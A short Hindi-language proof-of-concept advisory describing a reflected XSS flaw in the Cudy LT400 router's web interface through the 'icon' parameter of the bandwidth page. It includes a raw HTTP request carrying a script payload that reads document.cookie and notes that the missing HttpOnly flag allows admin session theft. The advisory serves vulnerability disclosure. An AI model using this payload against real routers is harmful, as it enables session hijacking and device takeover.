
प्रमाण-अवधारणा (Proof-of-concept) Cudy LT400 वेब इंटरफ़ेस में परावर्तित XSS के लिए, जो तैयार किए गए अनुरोधों के माध्यम से सत्र कुकी चोरी और एडमिन अधिग्रहण का प्रदर्शन करता है।
Cudy LT400 के वेब-आधारित प्रबंधन इंटरफ़ेस में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला मौजूद है।
पेज /cgi-bin/luci/admin/network/bandwidth में icon पैरामीटर के माध्यम से रिफ्लेक्टेड XSS है।
हमले के तरीकों में पीड़ित को एक विशेष रूप से तैयार अनुरोध भेजना शामिल होगा जिसमें दुर्भावनापूर्ण कोड हो।
प्रभावित एप्लिकेशन सत्र कुकी को HttpOnly विशेषता के साथ सेट नहीं करता है; इसके परिणामस्वरूप सत्र टोकन की चोरी के माध्यम से व्यवस्थापक का अधिग्रहण हो सकता है।
GET /cgi-bin/luci/admin/network/bandwidth?iface=4g&icon=icon-4g%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&i18name=Cellular HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology